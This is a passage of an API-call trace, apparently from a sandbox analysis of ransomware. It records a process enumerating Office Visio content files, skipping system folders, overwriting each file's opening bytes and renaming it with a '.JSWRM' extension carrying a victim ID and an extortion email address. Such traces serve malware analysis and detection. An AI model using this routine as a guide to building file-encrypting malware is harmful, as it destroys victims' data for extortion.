lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="msocache") returned -1 [0144.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.834] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=222933) returned 1 [0144.834] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.834] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.849] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.849] CloseHandle (hObject=0x314) returned 1 [0144.849] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.851] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1e9c9a8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1e9c9a8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1e9c9a8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x29afc, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLDCOR_VISIO2013_M.VSSX", cAlternateFileName="BLDCOR~1.VSS")) returned 1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2=".") returned 1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="..") returned 1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="...") returned 1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="documents and settings") returned -1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0144.851] lstrcmpiW (lpString1="BLDCOR_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0144.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0144.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0144.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.853] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=170748) returned 1 [0144.853] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.853] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.864] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.864] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.865] CloseHandle (hObject=0x314) returned 1 [0144.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.875] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3d4ec4f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3d4ec4f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3d4ec4f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x27bc6, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLDCOR_VISIO2013_U.VSSX", cAlternateFileName="BLDCOR~4.VSS")) returned 1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2=".") returned 1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="..") returned 1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="...") returned 1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="documents and settings") returned -1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0144.875] lstrcmpiW (lpString1="BLDCOR_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0144.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x241330, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0144.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0144.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.879] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=162758) returned 1 [0144.879] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.879] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.890] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.890] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.890] CloseHandle (hObject=0x314) returned 1 [0144.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.892] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x72a6d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLDGPLAN.DWG", cAlternateFileName="")) returned 1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2=".") returned 1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="..") returned 1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="...") returned 1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="windows") returned -1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="recovery") returned -1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="perflogs") returned -1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="documents and settings") returned -1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="$RECYCLE.BIN") returned 1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="system volume information") returned -1 [0144.892] lstrcmpiW (lpString1="BLDGPLAN.DWG", lpString2="msocache") returned -1 [0144.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.DWG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.DWG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDGPLAN.DWG", lpUsedDefaultChar=0x0) returned 12 [0144.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.DWG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.DWG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDGPLAN.DWG", lpUsedDefaultChar=0x0) returned 12 [0144.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDGPLAN.DWG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldgplan.dwg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.894] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=469613) returned 1 [0144.894] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.894] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.907] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.907] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.907] CloseHandle (hObject=0x314) returned 1 [0144.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDGPLAN.DWG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldgplan.dwg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDGPLAN.DWG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldgplan.dwg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.909] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd9ad, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLDGPLAN.JPG", cAlternateFileName="")) returned 1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2=".") returned 1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="..") returned 1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="...") returned 1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="windows") returned -1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="recovery") returned -1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="perflogs") returned -1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="documents and settings") returned -1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="$RECYCLE.BIN") returned 1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="system volume information") returned -1 [0144.909] lstrcmpiW (lpString1="BLDGPLAN.JPG", lpString2="msocache") returned -1 [0144.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.JPG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDGPLAN.JPG", lpUsedDefaultChar=0x0) returned 12 [0144.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDGPLAN.JPG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDGPLAN.JPG", lpUsedDefaultChar=0x0) returned 12 [0144.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDGPLAN.JPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldgplan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.911] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=55725) returned 1 [0144.911] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.911] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd9a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd9a0, lpOverlapped=0x0) returned 1 [0144.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.916] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd9a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd9a0, lpOverlapped=0x0) returned 1 [0144.918] CloseHandle (hObject=0x314) returned 1 [0144.918] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDGPLAN.JPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldgplan.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDGPLAN.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldgplan.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.919] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3437c9a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3437c9a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3437c9a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1226f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCK3_M.VSSX", cAlternateFileName="BLOCK3~1.VSS")) returned 1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2=".") returned 1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="..") returned 1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="...") returned 1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="windows") returned -1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="recovery") returned -1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="perflogs") returned -1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="documents and settings") returned -1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="system volume information") returned -1 [0144.924] lstrcmpiW (lpString1="BLOCK3_M.VSSX", lpString2="msocache") returned -1 [0144.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, 